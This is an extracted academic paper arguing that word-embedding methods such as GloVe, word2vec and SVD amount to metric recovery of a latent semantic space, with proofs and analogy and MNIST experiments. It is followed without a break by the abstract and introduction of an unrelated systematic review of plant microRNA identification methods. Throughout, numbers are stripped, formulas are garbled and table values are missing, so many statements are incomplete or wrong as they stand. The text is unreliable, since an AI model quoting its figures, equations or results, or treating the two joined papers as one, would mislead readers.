formally, given an m-token corpus consisting of sentences generated according to equation from a vocabulary of size n, let $c^{m,n}_{ij}(t_{n})$ be the number of times word j occurs $t_{n}$ steps after word i in the corpus. (this toy model ignores the role of syntax and function words, but these factors can be included as long as the moment bounds originally derived in hashimoto et al. ( b) remain fulfilled. the window size $t_{n}$ depends on the vocabulary size to ensure that all word pairs have nonzero co-occurrence counts in the limit of large vocabulary and corpus; for details see the definition of $g_{n}$ in appendix a.) we can show that there exist unigram normalizers $a^{m,n}_{i}$, $b^{m,n}_{j}$ such that the following holds:

lemma . given a corpus generated by equation , there exist $a_{i}$ and $b_{j}$ such that, simultaneously over all i, j,

$$\lim_{m,n\to\infty}\ -\log\!\big(c^{m,n}_{ij}(t_{n})\big)-a^{m,n}_{i}-b^{m,n}_{j}\ \to\ \frac{\|x_{i}-x_{j}\|^{2}}{\sigma^{2}}.$$

we defer the precise statement and conditions of lemma to corollary . (in lemma , we take m → ∞, growing corpus size, to ensure all word pairs appear sufficiently often, and n → ∞, growing vocabulary, to ensure that every point in the semantic space has a nearby word.) conceptually, this limiting result captures the intuition that while one-step transitions in a sentence may be complex and include non-metric structure expressed in h, co-occurrences over large windows relate directly to the latent semantic metric. for ease of notation, we henceforth omit the corpus and vocabulary size descriptors m, n (using $c_{ij}$, $a_{i}$, and $b_{j}$ in place of $c^{m,n}_{ij}(t_{n})$, $a^{m,n}_{i}$, and $b^{m,n}_{j}$), since in practice the corpus is large but fixed.

lemma serves as the basis for establishing consistency of recovery for word embedding algorithms (next section). it also allows us to establish a precise link between manifold learning and word embedding, which we describe in the remainder of this section.

. connection to manifold learning
let $\{v_{1},\ldots,v_{n}\}\in\mathbb{r}^{D}$ be points drawn i.i.d. from a density p, where D is the dimension of the observed inputs (e.g., number of pixels in the case of images), and suppose that these points lie on a manifold $\mathcal{m}\subset\mathbb{r}^{D}$ that is isometrically embeddable into d < D dimensions, where d is the intrinsic dimensionality of the data (e.g., coordinates representing illumination or camera angle in the case of images). the problem of manifold learning consists of finding an embedding of $v_{1},\ldots,v_{n}$ into $\mathbb{r}^{d}$ that preserves the structure of $\mathcal{m}$ by approximately preserving the distances between points along this manifold.
we use this observation to derive a new, sim- ple word embedding method inspired by lemma . . word embeddings as metric recovery glove the global vectors (glove) (pennington et al., ) method for word embedding optimizes the objective function min x̂,ĉ,a,b ∑ i,j f(cij)( 〈x̂i, ĉj〉 + ai + bj − log(cij)) with f(cij) = min(cij, ) / . if we rewrite the bias terms as ai = âi −||x̂i|| and bj = b̂j −||ĉj|| , we obtain the equivalent representation: min x̂,ĉ,â,̂b ∑ i,j f(cij)(− log(cij)−||x̂i−ĉj|| +âi+b̂j)) . together with lemma , we recognize this as a weighted multidimensional scaling (mds) objective this approach of applying random walks and word embed- dings to general graphs has already been shown to be surpris- ingly effective for social networks (perozzi et al., ), and demonstrates that word embeddings serve as a general way to connect metric random walks to embeddings. with weights f(cij). splitting the word vector x̂i and context vector ĉi is helpful in practice but not necessary under the assumptions of lemma since the true embedding x̂i = ĉi = xi/σ and âi, b̂i = is a global minimum whenever dim(x̂) = d. in other words, glove can recover the true metric provided that we set d correctly. word vec the skip-gram model of word vec approximates a softmax objective: min x̂,ĉ ∑ i,j cij log ( exp(〈x̂i, ĉj〉)∑n k= exp(〈x̂i, ĉk〉) ) . without loss of generality, we can rewrite the above with a bias term bj by making dim(x̂) = d + and setting one of the dimensions of x̂ to . by re- defining the bias b̂j = bj − ||ĉj|| / , we see that word vec solves min x̂,ĉ,̂b ∑ i,j cij log ( exp(− ||x̂i − ĉj|| + b̂j)∑n k= exp(− ||x̂i − ĉk|| + b̂k) ) . since according to lemma cij/ ∑n k= cik approaches exp(−‖|xi−xj|| /σ )∑n k= exp(−‖|xi−xk|| /σ ) , this is the stochastic neighbor embedding (sne) (hinton and roweis, ) objective weighted by ∑n k= cik. the global optimum is achieved by x̂i = ĉi = xi( √ /σ) and b̂j = (see theorem ). the neg- ative sampling approximation used in practice be- haves much like the svd approach of levy and goldberg ( b), and by applying the same sta- tionary point analysis as they do, we show that in the absence of a bias term the true embedding is a global minimum under the additional assumption that ||xi|| ( /σ ) = log( ∑ j cij/ √∑ ij cij) (hin- ton and roweis, ). svd the method of levy and goldberg ( b) uses the log pmi matrix defined in terms of the uni- gram frequency ci as: mij = log(cij)−log(ci)−log(cj) + log (∑ j cj ) and computes the svd of the shifted and truncated matrix: (mij + τ)+ where τ is a truncation param- eter to keep mij finite. under the limit of lemma , the corpus is sufficiently large that no truncation is necessary (i.e. τ = −min(mij) < ∞). we will recover the underlying embedding if we additionally assume σ ||xi|| = log(ci/ √∑ j cj) via the law of large numbers since mij → 〈xi,xj〉 (see theorem ). centering the matrix mij before obtaining the svd would relax the norm assumption, resulting ex- actly in classical mds (sibson, ). . metric regression from log co-occurrences we have shown that by simple reparameterizations and use of lemma , existing embedding algo- rithms can be interpreted as consistent metric recov- ery methods. however, the same lemma suggests a more direct regression method for recovering the la- tent coordinates, which we propose here. this new embedding algorithm serves as a litmus test for our metric recovery paradigm. lemma describes a log-linear relationship be- tween distance and co-occurrences. 
the canonical way to fit this relationship would be to use a generalized linear model, where the co-occurrences follow a negative binomial distribution $c_{ij} \sim \mathrm{negbin}(\theta, p)$ with $p = \theta/\big[\theta + \exp(-\lVert x_i - x_j\rVert^2 + a_i + b_j)\big]$. under this overdispersed log-linear model,
$$\mathbb{e}[c_{ij}] = \exp(-\lVert x_i - x_j\rVert^2 + a_i + b_j), \qquad \mathrm{var}(c_{ij}) = \mathbb{e}[c_{ij}]^2/\theta + \mathbb{e}[c_{ij}].$$
here, the parameter $\theta$ controls the contribution of large $c_{ij}$, and is akin to glove's $f(c_{ij})$ weight function. fitting this model is straightforward if we define the log-likelihood in terms of the expected rate $\lambda_{ij} = \exp(-\lVert x_i - x_j\rVert^2 + a_i + b_j)$ as
$$\mathrm{ll}(x,a,b,\theta) = \sum_{i,j} \bigg[\theta \log(\theta) - \theta \log(\lambda_{ij} + \theta) + c_{ij} \log\Big(1 - \frac{\theta}{\lambda_{ij} + \theta}\Big) + \log\Big(\frac{\Gamma(c_{ij} + \theta)}{\Gamma(\theta)\,\Gamma(c_{ij} + 1)}\Big)\bigg].$$
to generate word embeddings, we minimize the negative log-likelihood using stochastic gradient descent. the implementation mirrors that of glove and randomly selects word pairs i,j and attracts or repulses the vectors $\hat{x}$ and $\hat{c}$ in order to achieve the relationship in lemma . implementation details are provided in appendix c.

relationship to glove. the overdispersion parameter $\theta$ in our metric regression model sheds light on the role of glove's weight function $f(c_{ij})$. taking the taylor expansion of the log-likelihood around $\log(\lambda_{ij}) \approx \log(c_{ij})$, we have
$$\mathrm{ll}(x,a,b,\theta) = \sum_{ij} \bigg[k_{ij} - \frac{c_{ij}\theta}{2(c_{ij} + \theta)}\, u_{ij}^2 + o\big(u_{ij}^3\big)\bigg],$$
where $u_{ij} = \log \lambda_{ij} - \log c_{ij}$ and $k_{ij}$ does not depend on x. note the similarity of the second-order term with the glove objective. as $c_{ij}$ grows, the weight functions $c_{ij}\theta/\big(2(c_{ij} + \theta)\big)$ and $f(c_{ij}) = \min(c_{ij}, x_{\max})^{3/4}$ converge to $\theta/2$ and $x_{\max}^{3/4}$ respectively, down-weighting large co-occurrences.

empirical validation
we will now experimentally validate two aspects of our theory: the semantic space hypothesis (sections and ), and the correspondence between word embedding and manifold learning (sections and ). our goal with this empirical validation is not to find the absolute best method and evaluation metric for word embeddings, which has been studied before (e.g. levy et al. ( )). instead, we provide empirical evidence in favor of the semantic space hypothesis, and show that our simple algorithm for metric recovery is competitive with the state-of-the-art on both semantic induction tasks and manifold learning. since metric regression naturally operates over integer co-occurrences, we use co-occurrences over unweighted windows for this and, for fairness, for the other methods (see appendix c for details).

. datasets
corpus and training: we used three different corpora for training: a wikipedia snapshot of / ( . b tokens), the original word2vec corpus (mikolov et al., a) ( . b tokens), and a combination of wikipedia with gigaword emulating glove's corpus (pennington et al., ) ( . b tokens). we preprocessed all corpora by removing punctuation, numbers and lower-casing all the text. the vocabulary was restricted to the k most frequent words in each corpus. we trained embeddings using four methods: word2vec, glove, randomized svd, and metric regression (referred to as regression). full implementation details are provided in the appendix. (we used randomized, rather than full, svd due to the difficulty of scaling svd to this problem size; for performance of full svd factorizations see levy et al. ( ).)

[table: rows regression, glove, svd, word2vec; column groups google semantic, google syntactic, google total, sat, classification, and sequence, each reporting accuracy under l2 and cosine distance; the numeric entries are not recoverable from the source.]
table : accuracies on google, sat analogies and on two new inductive reasoning tasks. manifold learning word embedding semantic . . syntactic . . total . . table : semantic similarity alone can solve the google analogy tasks for fairness we fix all hyperparameters, and de- velop and test the code for metric regression exclu- sively on the first gb subset of the wiki dataset. for open-vocabulary tasks, we restrict the set of an- swers to the top k words, since this improves per- formance while covering the majority of the ques- tions. in the following, we show performance for the glove corpus throughout but include results for all corpora along with our code package. evaluation tasks: we test the quality of the word embeddings on three types of inductive tasks: analo- gies, sequence completion and classification (figure ). for the analogies, we used the standard open- vocabulary analogy task of mikolov et al. ( a) (henceforth denoted google), consisting of , semantic and syntactic questions. in addition, we use the more difficult sat analogy dataset (ver- sion ) (turney and littman, ), which contains questions from actual exams and guidebooks. each question consists of exemplar pairs of words word :word , where the same relation holds for all pairs. the task is to pick from among another five pairs of words the one that best fits the category im- plicitly defined by the exemplars. inspired by sternberg and gardner ( ), we propose two new difficult inductive reasoning tasks beyond analogies to verify the semantic space hy- pothesis: sequence completion and classification. as described in section , the former involves choosing the next step in a semantically coherent sequence of words (e.g. hour,minute, . . .), and the latter consists of selecting an element within the same category out of five possible choices. given the lack of publicly available datasets, we generated our own questions using wordnet (fellbaum, ) relations and word-word pmi values. these datasets were constructed before training the embeddings, so as to avoid biasing them towards any one method. for the classification task, we created in-category words by selecting words from wordnet relations associated to root words, from which we pruned to four words based on pmi-similarity to the other words in the class. additional options for the mul- tiple choice questions were created searching over words related to the root by a different relation type, and selecting those most similar to the root. for the sequence completion task, we obtained wordnet trees of various relation types, and pruned these based on similarity to the root word to obtain the sequence. for the multiple-choice questions, we proceeded as before to select additional (incorrect) options of a different relation type to the root. after pruning, we obtain classification ques- tions and sequence completion questions, of which are open-vocabulary and are multiple choice. these two new datasets are available . . results on inductive reasoning tasks solving analogies using survey data alone: we demonstrate that, surprisingly, word embeddings trained directly on semantic similarity derived from survey data can solve analogy tasks. extending a study by rumelhart and abrahamson ( ), we use a free-association dataset (nelson et al., ) to construct a similarity graph, where vertices cor- respond to words and the weights wij are given by the number of times word j was considered most similar to word i in the survey. 
we take the largest connected component of this graph (consisting of words and weights) and embed it us- ing isomap for which squared edge distances are de- fined as − log(wij/ maxkl(wkl)). we use the result- http://web.mit.edu/thashim/www/supplement materials.zip figure : dimensionality reduction using word embedding and manifold learning. performance is quantified by percentage of -nearest neighbors sharing the same digit label. ing vectors as word embeddings to solve the google analogy task. the results in table show that em- beddings obtained with isomap on survey data can outperform the corpus based metric regression vec- tors on semantic, but not syntactic tasks. we hypoth- esize that free-association surveys capture semantic, but not syntactic similarity between words. analogies: the results on the google analogies shown in table demonstrate that our proposed framework of metric regression and l distance is competitive with the baseline of word vec with cosine distance. the performance gap across meth- ods is small and fluctuates across corpora, but met- ric regression consistently outperforms glove on most tasks and outperforms all methods on seman- tic analogies, while word vec does better on syn- tactic categories. for the sat dataset, the l dis- tance performs better than the cosine similarity, and we find word vec to perform best, followed by metric regression. the results on these two analogy datasets show that directly embedding the log co- occurrence metric and taking l distances between vectors is competitive with current approaches to analogical reasoning. sequence and classification tasks: as predicted by the semantic field hypothesis, word embeddings perform well on the two novel inductive reasoning tasks (table ). again, we observe that the metric recovery with metric regression coupled with l dis- tance consistently performs as well as and often bet- ter than the current state-of-the-art word embedding methods on these two additional semantic datasets. . word embeddings can embed manifolds in section we proposed a reduction for solving manifold learning problems with word embeddings which we show achieves comparable performance to manifold learning methods. we now test this rela- tion by performing nonlinear dimensionality reduc- tion on the mnist digit dataset, reducing from d = to two dimensions. using a four-thousand im- age subset, we construct a k-nearest neighbor graph (k = ) and generate simple random walks of length starting from each vertex in the graph, re- sulting in , sentences of length each. we compare the four word embedding methods against standard dimensionality reduction methods: pca, isomap, sne and, t-sne. we evaluate the meth- ods by clustering the resulting low-dimensional data and computing cluster purity, measured using the percentage of -nearest neighbors having the same digit label. the resulting embeddings, shown in fig. , demonstrate that metric regression is highly effective at this task, outperforming metric sne and beaten only by t-sne ( % cluster purity), which is a visualization method specifically designed to pre- serve cluster separation. all word embedding meth- ods including svd ( %) embed the mnist digits remarkably well and outperform baselines of pca ( %) and isomap ( %). discussion our work recasts word embedding as a metric recov- ery problem pertaining to the underlying semantic space. 
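as a brief aside on the evaluation just described, the cluster-purity score (the fraction of each embedded point's nearest neighbors that share its digit label) can be computed as in the following sketch; scikit-learn is assumed, and the value of k and the array names are illustrative rather than the exact evaluation code used here.

```python
import numpy as np
from sklearn.neighbors import NearestNeighbors

def knn_label_purity(embedding, labels, k=5):
    """Average fraction of each point's k nearest neighbours (self excluded)
    that carry the same label as the point itself."""
    nn = NearestNeighbors(n_neighbors=k + 1).fit(embedding)
    _, idx = nn.kneighbors(embedding)            # idx[:, 0] is the point itself
    neighbour_labels = labels[idx[:, 1:]]        # shape (n_points, k)
    return float((neighbour_labels == labels[:, None]).mean())

# e.g. purity = knn_label_purity(low_dim_vectors, digit_labels, k=5)
```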
we use co-occurrence counts from random walks as a theoretical tool to demonstrate that exist- ing word embedding algorithms are consistent met- ric recovery methods. our direct regression method is competitive with the state of the art on various se- mantics tasks, including two new inductive reason- ing problems of series completion and classification. our framework highlights the strong interplay and common foundation between word embedding methods and manifold learning, suggesting several avenues for recovering vector representations of phrases and sentences via properly defined markov processes and their generalizations. appendix a metric recovery from markov processes on graphs and manifolds consider an infinite sequence of points xn = {x , . . . ,xn}, where xi are sampled i.i.d. from a density p(x) over a compact riemannian manifold equipped with a geodesic metric ρ. for our pur- poses, p(x) should have a bounded log-gradient and a strict lower bound p over the manifold. the ran- dom walks we consider are over unweighted spatial graphs defined as definition (spatial graph). let σn : xn → r> be a local scale function and h : r≥ → [ , ] a piecewise continuous function with sub-gaussian tails. a spatial graph gn corresponding to σn and h is a random graph with vertex set xn and a di- rected edge from xi to xj with probability pij = h(ρ(xi,xj) /σn(xi) ). simple examples of spatial graphs where the con- nectivity is not random include the ε ball graph (σn(x) = ε) and the k-nearest neighbor graph (σn(x) =distance to k-th neighbor). log co-occurrences and the geodesic will be con- nected in two steps. ( ) we use known results to show that a simple random walk over the spatial graph, properly scaled, behaves similarly to a dif- fusion process; ( ) the log-transition probability of a diffusion process will be related to the geodesic metric on a manifold. ( ) the limiting random walk on a graph: just as the simple random walk over the integers con- verges to a brownian motion, we may expect that under specific constraints the simple random walk xnt over the graph gn will converge to some well- defined continuous process. we require that the scale functions converge to a continuous function σ̄ (σn(x)g− n a.s.−−→ σ̄(x)); the size of a single step van- ish (gn → ) but contain at least a polynomial num- ber of points within σn(x) (gnn d+ log(n) − d+ → ∞). under this limit, our assumptions about the density p(x), and regularity of the transitions , the for t = Θ(g− n ), the marginal distribution np(xt|x ) must be a.s. uniformly equicontinuous. for undirected spatial graphs, this is always true (croydon and hambly, ), but for directed graphs it is an open conjecture from (hashimoto et al., b). following holds: theorem ((hashimoto et al., b; ting et al., )). the simple random walk xnt on gn con- verges in skorokhod space d([ ,∞),d) after a time scaling t̂ = tg n to the itô process yt̂ valued in c([ ,∞),d) as xn t̂g− n → yt̂. the process yt̂ is de- fined over the normal coordinates of the manifold (d,g) with reflecting boundary conditions on d as dyt̂ = ∇ log(p(yt̂))σ(yt̂) dt̂ + σ(yt̂)dwt̂ ( ) the equicontinuity constraint on the marginal densities of the random walk implies that the tran- sition density for the random walk converges to its continuum limit. lemma (convergence of marginal densities). (hashimoto et al., a) let x be some point in our domain xn and define the marginal densities q̂t(x) = p(yt = x|y = x ) and qtn (x) = p(xnt = x|xn = x ). if tng n = t̂ = Θ( ), then under condition (?) 
and the results of theorem such that xnt → y nt weakly, we have lim n→∞ nqtn (x) = q̂t̂(x)p(x) − . ( ) log transition probability as a metric we may now use the stochastic process yt̂ to connect the log transition probability to the geodesic distance using varadhan’s large deviation formula. theorem ((varadhan, ; molchanov, )). let yt be a itô process defined over a complete riemann manifold (d,g) with geodesic distance ρ(xi,xj) then lim t→ −t log(p(yt = xj|y = xi)) → ρ(xi,xj) . this estimate holds more generally for any space admitting a diffusive stochastic process (saloff- coste, ). taken together, we finally obtain: corollary (varadhan’s formula on graphs). for any δ,γ,n there exists some t̂, n > n , and se- quence bnj such that the following holds for the sim- ple random walk xnt : p ( sup xi,xj∈xn ∣∣∣t̂ log(p(xn t̂g− n = xj | xn = xi)) − t̂bnj −ρσ(x)(xi,xj) ∣∣∣ > δ ) < γ where ρσ(x) is the geodesic defined as ρσ(x)(xi,xj) = min f∈c :f( )=xi,f( )=xj ∫ σ(f(t))dt proof. the proof is in two parts. first, by varad- han’s formula (theorem , (molchanov, , eq. . )) for any δ > there exists some t̂ such that: sup y,y′∈d |−t̂ log(p(yt̂ = y ′|y = y))−ρσ(x)(y′,y) | < δ the uniform equicontinuity of the marginals implies their uniform convergence (lemma s ), so for any δ > and γ , there exists a n such that p( sup xj,xi∈xn |p(yt̂ = xj|y = xi) −np(xj)p(xng− n t̂ = xj|x n = xi)| > δ ) < γ by the lower bound on p and compactness of d, p(yt̂|y ) is lower bounded by some strictly positive constant c and we can apply uniform continuity of log(x) over (c,∞) to get that for some δ and γ, p ( sup xj,xi∈xn | log(p(yt̂ = xj|y = xi))−log(np(xj)) − log(p(xn g− n t̂ = xj|xn = xi))| > δ ) < γ. ( ) finally we have the bound, p ( sup xi,xj∈xn |− t̂ log(p(xn g− n t̂ = xj|xn = xi)) −t̂ log(np(xj))−ρσ(x)(xi,xj) | > δ +t̂δ ) < γ to combine the bounds, given some δ and γ, set bnj = log(np(xj)), pick t̂ such that δ < δ/ , then pick n such that the bound in eq. holds with prob- ability γ and error δ < δ/( t̂). b consistency proofs for word embedding lemma (consistency of svd). assume the norm of the latent embedding is proportional to the uni- gram frequency ||xi||/σ = ci/( ∑ j cj) under these conditions, let x̂ be the embedding de- rived from the svd of mij as x̂x̂t = mij = log(cij) − log ( ci ) − log ( cj ) + log (∑ i ci ) + τ. then there exists a τ such that this embedding is close to the true embedding under the same equiva- lence class as lemma s p (∑ i ||ax̂i/σ −xj|| > δ ) < ε. proof. by corollary for any δ > and ε > there exists a m such that p(sup i,j |− log(cij) − (||xi −xj|| /σ ) − log(mc)| > δ ) < ε . now additionally, if ci/ √∑ j cj = ||xi|| /σ then we can rewrite the above bound as p(sup i,j | log(cij)−log(ci)−log(cj)+log( ∑ i ci) − 〈xi,xj〉/σ − log(mc)| > δ ) < ε . and therefore, p(sup i,j |mij − 〈xi,xj〉/σ − log(mc)| > δ ) < ε . given that the dot product matrix has error at most δ , the resulting embedding it known to have at most√ δ error (sibson, ). this completes the proof, since we can pick τ = − log(mc), δ = δ and ε = ε. theorem (consistency of softmax/word vec). define the softmax objective function with bias as g(x̂, ĉ, b̂) = ∑ ij cij log exp(−||x̂i − ĉj|| + b̂j)∑n k= exp(−||x̂i − ĉk|| + b̂k) define xm,cm,bm as the global minima of the above objective function for a co-occurrence cij over a corpus of size m. for any ε > and δ > there exists some m such that p(|g( x σ , x σ , ) −g(xm,cm,bm)| > δ) < ε proof. 
by differentiation, any objective of the form min λij cij log ( exp(−λij)∑ k exp(−λik) ) has the minima λ∗ij = − log(cij) + ai up to un-identifiable ai with objective function value cij log(cij/ ∑ k cik). this gives a global function lower bound g(xm,cm,bm) ≥ ∑ ij cij log ( cij∑ k cik ) ( ) now consider the function value of the true embed- ding x σ ; g( x σ , x σ , ) = ∑ ij cij log exp(− σ ||xi −xj|| )∑ k exp(− σ ||xi −xk|| ) = ∑ ij cij log ( exp(log(cij) + δij + ai)∑ k exp(log(cik) + δik + ai) ) . we can bound the error variables δij using corol- lary as supij |δij| < δ with probability ε for sufficiently large m with ai = log(mi) − log( ∑n k= exp(−||xi −xk|| /σ )). taking the taylor expansion at δij = , we have g( x σ , x σ , ) = ∑ ij cij log cij∑ k cik + n∑ l= cil∑ k cikδil + o(||δ|| ) by the law of large numbers of cij, p (∣∣∣g( xσ, x σ , )− ∑ ij cij log ( cij∑ k cik )∣∣∣ > nδ ) < ε which combined with ( ) yields p(|g( x σ , x σ , ) −g(x,c,b)| > nδ ) < ε . to obtain the original theorem statement, take m to fulfil δ = δ/n and ε = ε. note that for word vec with negative-sampling, applying the stationary point analysis of levy and goldberg ( b) combined with the analysis in lemma s shows that the true embedding is a global minimum. c empirical evaluation details c. implementation details we used off-the-shelf implementations of word vec and glove . the two other methods (randomized) svd and regression embed- ding are both implemented on top of the glove codebase. we used -dimensional vectors and window size in all models. further details are provided below. http://code.google.com/p/word vec http://nlp.stanford.edu/projects/glove word vec. we used the skip-gram version with negative samples, iterations, α = . and fre- quent word sub-sampling with a parameter of − . glove. we disabled glove’s corpus weighting, since this generally produced superior results. the default step-sizes results in nan-valued embed- dings, so we reduced them. we used xmax = , η = . and iterations. svd. for the svd algorithm of levy and gold- berg ( b), we use the glove co-occurrence counter combined with a parallel randomized pro- jection svd factorizer, based upon the redsvd li- brary due to memory and runtime constraints. fol- lowing levy et al. ( ), we used the square root factorization, no negative shifts (τ = in our nota- tion), and , random projections. regression embedding. we use standard sgd with two differences. first, we drop co-occurrence values with probability proportional to − cij/ when cij < , and scale the gradient, which re- sulted in training time speedups with no loss in ac- curacy. second, we use an initial line search step combined with a linear step size decay by epoch. we use θ = and η is line-searched starting at η = . c. solving inductive reasoning tasks the ideal point for a task is defined below: • analogies: given a:b::c, the ideal point is given by b −a + c (parallelogram rule). • analogies (sat): given prototype a:b and candidates c : d . . .cn : dn, we compare di −ci to the ideal point b −a. • categories: given a category implied by w , . . . ,wn, the ideal point is i = n ∑n i= wi. • sequence: given sequence w : · · · : wn we compute the ideal as i = wn + n (wn −w ). once we have the ideal point i, we pick the answer as the word closest to i among the options, using l or cosine distance. for the latter, we normalize i to unit norm before taking the cosine distance. for l we do not apply any normalization. 
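to make the ideal-point scheme above concrete, here is a minimal sketch; it assumes a dict mapping words to numpy vectors, and the helper names are illustrative rather than part of the released code. the sequence rule follows the description above (last word plus the first-to-last difference scaled by 1/n), and the sat variant, which compares each candidate difference to b − a, is analogous and omitted.

```python
import numpy as np

def ideal_point(task, words, emb):
    vecs = [emb[w] for w in words]
    if task == "analogy":                    # a : b :: c : ?  ->  b - a + c (parallelogram rule)
        a, b, c = vecs
        return b - a + c
    if task == "category":                   # centroid of the exemplar words
        return np.mean(vecs, axis=0)
    if task == "sequence":                   # w_n + (w_n - w_1) / n
        return vecs[-1] + (vecs[-1] - vecs[0]) / len(vecs)
    raise ValueError(f"unknown task: {task}")

def answer(task, words, options, emb, metric="l2"):
    target = ideal_point(task, words, emb)
    if metric == "cos":                      # normalize the ideal point for cosine distance
        target = target / np.linalg.norm(target)
        score = lambda w: -np.dot(target, emb[w] / np.linalg.norm(emb[w]))
    else:                                    # plain L2 distance, no normalization
        score = lambda w: np.linalg.norm(emb[w] - target)
    return min(options, key=score)
```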
https://github.com/ntessore/redsvd-h references sanjeev arora, yuanzhi li, yingyu liang, tengyu ma, and andrej risteski. . random walks on con- text spaces: towards an explanation of the myster- ies of semantic word embeddings. arxiv preprint arxiv: . . kenneth ward church and patrick hanks. . word association norms, mutual information, and lexicogra- phy. computational linguistics, ( ): – . david a croydon and ben m hambly. . local limit theorems for sequences of simple random walks on graphs. potential analysis, ( ): – . christiane fellbaum, editor. . wordnet: an elec- tronic lexical database. thomas l griffiths, mark steyvers, and joshua b tenen- baum. . topics in semantic representation. psy- chological review, ( ): . zellig s harris. . distributional structure. word, ( ): – . tatsunori hashimoto, yi sun, and tommi jaakkola. a. from random walks to distances on un- weighted graphs. in advances in neural information processing systems. tatsunori hashimoto, yi sun, and tommi jaakkola. b. metric recovery from directed unweighted graphs. in artificial intelligence and statistics, pages – . geoffrey e hinton and sam t roweis. . stochastic neighbor embedding. in advances in neural informa- tion processing systems, pages – . matthäus kleindessner and ulrike von luxburg. . dimensionality estimation without distances. in pro- ceedings of the artificial intelligence and statistics conference (aistats). omer levy and yoav goldberg. a. linguistic regularities in sparse and explicit word representa- tions. in proceedings th conference on computa- tional natural language learning, pages – . omer levy and yoav goldberg. b. neural word embedding as implicit matrix factorization. in ad- vances in neural information processing systems, pages – . omer levy, yoav goldberg, and ido dagan. . im- proving distributional similarity with lessons learned from word embeddings. transactions of the associa- tion for computational linguistics, : – . tomas mikolov, kai chen, greg corrado, and jeffrey dean. a. efficient estimation of word representa- tions in vector space. in iclr workshop. tomas mikolov, ilya sutskever, kai chen, greg s cor- rado, and jeff dean. b. distributed represen- tations of words and phrases and their composition- ality. in advances in neural information processing systems, pages – . sa molchanov. . diffusion processes and rie- mannian geometry. russian mathematical surveys, ( ): . douglas l nelson, cathy l mcevoy, and thomas a schreiber. . the university of south florida free association, rhyme, and word fragment norms. be- havior research methods, instruments, & computers, ( ): – . jeffrey pennington, richard socher, and christopher d manning. . glove: global vectors for word rep- resentation. in proceedings of the empiricial methods in natural language processing, pages – . bryan perozzi, rami al-rfou, and steven skiena. . deepwalk: online learning of social representations. in proceedings of the th acm sigkdd interna- tional conference on knowledge discovery and data mining, pages – . acm. david e rumelhart and adele a abrahamson. . a model for analogical reasoning. cognitive psychol- ogy, ( ): – . laurent saloff-coste. . the heat kernel and its es- timates. probabilistic approach to geometry, : – . gideon schwarz and amos tversky. . on the reci- procity of proximity relations. journal of mathemati- cal psychology, ( ): – . robin sibson. . studies in the robustness of multidi- mensional scaling: perturbational analysis of classical scaling. journal of the royal statistical society. 
series b (methodological), pages – . richard socher, john bauer, christopher d manning, and andrew y ng. . parsing with compositional vector grammars. in proceedings of the acl conference. robert j sternberg and michael k gardner. . unities in inductive reasoning. journal of experimental psychology: general, ( ): . joshua b tenenbaum, vin de silva, and john c langford. . a global geometric framework for nonlinear dimensionality reduction. science, ( ): – . joshua b tenenbaum. . mapping a manifold of perceptual observations. in advances in neural information processing systems, pages – . daniel ting, ling huang, and michael jordan. . an analysis of the convergence of graph laplacians. arxiv preprint arxiv: . . joseph turian, lev ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in proceedings of the th annual meeting of the association for computational linguistics, pages – . acl. peter d turney and michael l littman. . corpus-based learning of analogies and semantic relations. machine learning, ( - ): – . amos tversky and j hutchinson. . nearest neighbor analysis of psychological spaces. psychological review, ( ): . srinivasa rs varadhan. . diffusion processes in a small time interval. communications on pure and applied mathematics, ( ): – .

submitted april accepted october published november corresponding author indika kahanda, indika.kahanda@montana.edu academic editor christopher mungall additional information and declarations can be found on page doi . /peerj-cs. copyright manuweera et al. distributed under creative commons cc-by . open access computational methods for the ab initio identification of novel microrna in plants: a systematic review buwani manuweera, gillian reynolds, and indika kahanda gianforte school of computing, montana state university, bozeman, mt, united states of america; department of plant sciences and plant pathology, montana state university, bozeman, mt, united states of america. abstract background. micrornas (mirnas) play a vital role as post-transcriptional regulators in gene expression. experimental determination of mirna sequence and structure is both expensive and time consuming. the next-generation sequencing revolution, which facilitated the rapid accumulation of biological data, has brought biology into the ''big data'' domain.
as such, developing computational methods to predict mirnas has become an active area of inter-disciplinary research. objective. the objective of this systematic review is to focus on the developments of ab initio plant mirna identification methods over the last decade. data sources. five databases were searched for relevant articles, according to a well-defined review protocol. study selection. the search results were further filtered using the selection criteria that only included studies on novel plant mirna identification using machine learning. data extraction. relevant data from each study were extracted in order to carry out an analysis of their methodologies and findings. results. results depict that in the last decade, there were articles published on novel mirna identification methods in plants, of which only were primarily focused on plant microrna identification. our findings suggest a need for more stringent plant-focused mirna identification studies. conclusion. overall, the study accuracies are of a satisfactory level, although they may generate a considerable number of false negatives. in future, attention must be paid to the biological plausibility of computationally identified mirnas to prevent further propagation of biologically questionable mirna sequences. subjects bioinformatics, computational biology keywords ab initio, microrna, plant, machine learning, systematic review

introduction
micrornas (mirnas) are a large family of small (approx. – nucleotides) single-stranded rnas, involved in post-transcriptional gene regulation through the cleavage and/or inhibition of target mrnas (rogers & chen, ; voinnet, ). despite being found throughout the eukaryotic kingdom, plant micrornas differ from their metazoan counterparts in a number of ways, including their genomic loci (regions in which their genes can be found, i.e., introns, utrs, etc.), biogenesis, length, methods of target recognition and number of targets per mirna molecule (axtell, westholm & lai, ; moran et al., ). computationally, plant and animal mirnas can be differentiated through several distinguishing characteristics such as helix number, stack number, length of pre-mirna and minimum free energy (zhu et al., ). indeed, it is currently uncertain if plant and animal micrornas share a common origin or if they evolved independently in both lineages (axtell, westholm & lai, ; moran et al., ; zhang et al., ). despite the uncertainty regarding their origin, it has never been more important for the focused characterization of plant micrornas. production levels for many of the world's crops are under threat from increases in global temperatures, changing patterns of rainfall and extreme weather events such as droughts, heatwaves and heavy rainfall (mall, gupta & sonkar, ). a meta-analysis of over , simulations for wheat, rice and maize has indicated that an increase of just degrees will cause losses in aggregate production (challinor et al., ).
